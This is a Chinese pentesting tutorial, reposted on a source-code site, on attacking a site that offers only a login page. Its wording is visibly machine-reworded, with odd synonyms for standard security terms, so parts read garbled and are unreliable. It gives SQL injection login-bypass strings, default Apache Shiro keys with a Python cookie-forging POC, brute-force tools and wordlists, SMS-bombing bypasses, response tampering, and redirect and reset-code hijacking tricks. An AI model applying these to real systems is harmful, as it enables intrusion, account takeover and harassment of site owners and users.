登陆页面渗入测试常见的几种思绪与总结！-百分百源码网

登陆页面渗入测试常见的几种思绪与总结！

发布时间：08/01 来源：未知浏览：关键词：

前言

我们在进行渗入测试的时候，常常会碰到很多网站站点，而有的网站仅仅是基于一个登陆接口进行处置的。尤为是在内网环境的渗入测试中，客户常常丢给你一个登陆网站页面，没有测试账号，让你本人进行渗入测试，一开端经验不够的话，可能会无从下手。今天就来简略说一下怎样在只要一个登陆页面的状况下，来进行渗入测试。

0x00

在前提允许的状况下，我们可以拿在渗入测试的开端以前拿出我们的扫描器来进行扫描，当前我们最常用的就是AWVS和Nessus，除此以外，我们还可以运用一些另外主动化测试工具，例如Nikto扫描器，Appscan，W3af，以及比来长亭科技的Xray扫描器，都可以试试。尤为是Xray扫描器，听说有很多小同伴靠它挖到了很多破绽。

下列是这些工具的一些运用办法，不进行赘述
    Nikto https://zhuanlan.zhihu.com/p/70225775
    Xray  https://chaitin.github.io/xray/#/
    W3af  https://www.freebuf.com/column/145984.html
    Appscan https://zhuanlan.zhihu.com/p/28729371

0x01 SQL注入

全能密码绕过
要是我们能够直接绕过登录，来直接拜访系统内部资源，那天然是最佳不外的了。全能密码就是其中一最佳用的一种，虽然存在的可能性不大，但是偶然也是存在的，略微尝试一下也不会浪费太多工夫。
例如'or 1=1 –
"or "a"="a
全能密码在网上非常多，随意搜一下就有
例如这样，就能直接拜访后台

登录口SQL注入
有的系统在登录口就存在SQL注入，当前我碰到过比拼多的是Oracle以及MySQL的登录口注入，我们可以在登录处先抓一个包，然后依据抓包信息来结构Payload。值得一提的是，有时候我们需要在Burp里修改一下发包格局（change body encoding），才干成功注入。

在这给个例子：
正常登录报错

加一个引号

修改payload,以此返回数据包不一样来推断存在SQL注入。

而且，这类的SQL注入并不很少见到，在很多网站中都可以进行尝试，很有可能会存在此破绽

0x02 明文传输/会员名可枚举/爆破弱口令

明文传输
可能是我们做渗入测试中，最常见的一种破绽，现实上它并不克不及算得上是一种破绽，仅仅只能说是一种不够之处罢了，明文传输在网站上随处可见，除了银行网站，很有可能每一个密码都是经过特别加密然后再进行传输的。

会员名可枚举
此破绽存在主如果由于页面临所输入的账号密码进行的推断所回显的数据不同，我们可以通过这点来进行会员名的枚举，然后通过枚举后的账户名来进行弱口令的爆破。防御伎俩的话仅需要将会员名与密码出错的回显酿成同样即可，例如会员名或密码出错。

爆破弱口令
弱口令可以说是渗入测试中，最最常见，也是危害“最大”的一种破绽，由于毫无技术性，毫无新意，但是却洋溢了“毁坏性”，尤为是在内网环境中，弱口令更是无处不在。Web页面最常用的爆破工具为Burp，我们平常运用Nmap扫描也可能扫出其他端口存在，例如3389，SSH等。

弱口令爆破工具举荐,详情可看下列，不在赘述：
Hydra：https://yq.aliyun.com/articles/608406/
超级弱口令：链接：https://pan.百度.com/s/1mkwnxu19Aq-KEVCWOZn99w 提取码：blj3
复制这段内容后打开baidu网盘手机App，操纵更利便哦
御剑RDP爆破: https://github.com/foryujian/yujianrdpcrack
Bruter: https://www.uedbox.com/post/8478/

此外，我们还可以依据网站域名，以及收集的一些信息来进行定制化爆破，例如我在一次内网渗入测试中，发明了治理员的名字缩写为crj，然后我就生成了一堆密码，最后成功登陆账号密码为crj112233。

定制化生成字典： http://tools.mayter.cn/
字典： https://github.com/rootphantomer/Blasting_dictionary

还有许多字典，可以在网上多收集一些，有时候你离Getshell，仅仅只差一个弱口令。

此外，有时候我们还可能碰到存在默许密码的系统，在这给出一些网上公示的默许账户密码

0x03 扫描

名目扫描
在我眼里，这是最佳用的名目扫描工具:https://github.com/maurosoria/dirsearch ,DirSearch已经成为了我日常渗入工作中密不成分的工具之一，而且我们可以多级别扫描，在枚举子名目的名目，许多时候可以寻到冲破口。

除此以外，还有御剑：https://github.com/52stu/- 也是比拼常用的

JS扫描
JS文件我们在渗入测试中也是时常用到的东西，有时候我们可以在JS文件中寻到我们平时看不到的东西，例如重置密码的JS，发送短信的JS，都是有可能未授权可拜访的。JS扫描的话举荐运用JSFind: https://github.com/Threezh1/JSFinder
同时它也会提取页面中的URL，简略举例

nmap扫描
Nmap的强大功能能让我们首先工夫猎取网站的端口信息，而这些端口信息中常常可以赋予我们非常大的帮忙，例如开放了3389端口，或者一些敏锐端口的探测，Nmap的运用办法比拟不需要我再多说，每个平安工程师都必需要精通的一种工具，下列是我的一些端口小总结，但愿可以给与大家一点儿帮忙。

在扫描名目与JS这块，要注意屡次爆破，遍历拜访多级域名的名目与JS。
我就曾在一个学校网站中，运用Nmap对大量网段的探测，获得了一个登陆网站，而且在网站中遍历名目，获得了一个test页面，最后在这个页面的JS文件中，猎取到了一个接口，通过这个接口重置了主登录页面的密码。

0x04 框架破绽

寻觅CMS，或者网页框架，以及某些厂商的办事存在破绽
例如Apache中间件组件Shiro反序列化破绽，这里简略说一下：
需要一个ysoserial.jar https://github.com/frohoff/ysoserial
以及默许秘钥
4AvVhmFLUs0KTA3Kprsdag==
2AvVhdsgUs0FSA3SDFAdag==
2AvVhdDFCVdfdfDFAdag==
3AvVhmFLUs0KTA3Kprsdag==
kPH+bIxk5D2deZiIxcaaaA
wGiHplamyXlVB11UXWol8g==
6ZmI6I2j5Y+R5aSn5ZOlAA==
AsfawfsdfaAasdWWW==
Z3VucwAAAAAAAAAAAAAAAA==
6ZmI6I2j5Y+R5aSn5ZOlAA==
ZUdsaGJuSmxibVI2ZHc9PQ==
1QWLxg+NYmxraMoxAXu/Iw==
POC
from Crypto.Cipher import AES
from Crypto import Random
from base64 import b64encode
from base64 import b64decode

BS = AES.block_size
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)

def encrypt(key, text):
    IV = Random.new().read(AES.block_size)
    cipher = AES.new(key, AES.MODE_CBC, IV=IV)
    data = b64encode(IV + cipher.encrypt(pad(text)))
    return data

key= b64decode('2AvVhdsgUs0FSA3SDFAdag==')
print encrypt(key, open('payload.dat','rb').read())

运用办法
1：java -jar ysoserial.jar URLDNS "你的ceye.io或者burp的collaborator client功能中">payload.dat
2：运转python足本，生成cookie

3：将cookie复制到burp发包,此时DNSlog就会记载，我们可以再次结构进行下令施行，在这不进行深入。

致远A8-getshell： https://www.cnblogs.com/dgjnszf/p/11104594.html
Thinkphp： https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
Struts2: https://github.com/HatBoy/Struts2-Scan
weblogic: https://github.com/rabbitmask/WeblogicScan
以及各大Java反序列化破绽等等，这里的破绽都说不完了。

0x05 逻辑破绽

寻觅逻辑破绽，例如忘怀密码，任意会员注册

任意重置密码
例如

此时客户端会发一个验证码包，我们这是随便输入验证码，发包，返回包。
返回包差错的回显为{"status":0}
将返回包的东西换成{"status":1}
即可重置密码

乌云示例：http://www.anquan.us/static/bugs/wooyun-2013-039809.html

任意会员注册
爆破注册页面的验证码，即可任意会员注册

一样，这里的验证码要是为四位数的话，有时候也可能存在可爆破，可进行任意会员重置密码

短信轰炸
短信轰炸很常见，个别在发送验证码后抓包，一直repeate即可，要是做了一定防护的话，在增加空格，或者特别符号，或+86等都可以进行绕过

未经过防护的短信爆破十分常见

不完全的登录
这个破绽我寻到过一次，就是在登录页面，随便输入任意的账户和密码，然后抓包，修改返回包，骗过前端，从而获得一定的权限，其功能不完美，但是照旧可以看到很多敏锐数据。

逻辑破绽这里要依据不一样网站来进行测试，逻辑破绽的方式五花八门，常常会碰到很多蹊跷怪僻的姿态，例如cookie某字段为Guest，修改为admin即可改换会员身份的，还需要在日常工作中多加总结。

0x06 禁用JS

禁用JS插件，查看页面源代码12
禁用JS和查看源代码，有时候会成心想不到的欣喜。

例如某些重定向，某些权限缺失，在我们未授权进入后台一眨眼，就会重定向回去登录页面，而要是此时我们禁用了JS，则可以进行一定权限的控制。

查看源代码则不消多说，有的不大聪慧的程序员可能会在源代码里泄露一些不成告人的机密，例如测试账号，还有我们可能会寻到一些网站的后台构造，以及JS接口。

0x07 URL重定向

URL重定向
URL重定向是我们渗入测试中非常常见的一个破绽，个别涌现在下列参数里，而登录经常常也有这个URL重定向到后台网站，我们修改这个后台网站的URL即可跳转到任意页面，可用于钓鱼页面的制作
例如 http://www.aaa.com?url=aHR0cDovL2FkbWluLmFhYS5jb20=
url背面常会进行base64编码处置

常见URL跳转参数：
redirect
redirect_to
redirect_url
url
jump
jump_to
target
to
link
linkto
Domain

0x08 未授权拜访

各种未授权拜访，免登录进入后台
未授权拜访在这里有更强的大佬总结了，其需要我们对端口进行注意调查。
https://xz.aliyun.com/t/6103

0x09 验证码题目

验证码可修改承受者
可将A账号的修改密码验证码承受者修改为B，这样A账号的验证码就会发到B的手机上，从而B可以重置A的账号密码
例如A账号moblephone=13333888888 ，这点是可控的，我们修改为moblephone=18888888888,即可收到A账号的重置验证码

登录验证码可绕过
可能存在全能验证码0000或者9999，不外此类状况较为很少见到。更多的状况为修改返回包，可能会涌现可绕过逻辑推断。

验证码可爆破
验证码失效的工夫过长，而且为纯数字或者过短字符，致使可被爆破。

验证码回显前端
有的网站验证码会回显到前端，只需要抓包即可获得验证码

验证码不刷新
验证码不会主动刷新，致使我们可一码屡次运用，我们只需要输入一次验证码就可以让我们能够开端进行暴力破解。

验证码辨认
这里运用PKAV的验证码主动辨认
链接：https://pan.百度.com/s/1-l16Nxse7SqQdgSiPZS2-A 提取码：szo2

0x10 总结

简略的来说，碰到一个登陆站点，我们需要做的时候有
1、前提允许的状况下开启破绽扫描
2、敏锐信息的探测，例如端口，名目，JS文件
3、爆破弱口令
4、抓包看看可否存在逻辑破绽，或者SQL注入进行尝试
5、寻觅框架破绽
PS:要是碰到某些大网站的主站登录，例如银行，倡议舍弃，寻觅其他业务，例如聘请站点登录等。

打赏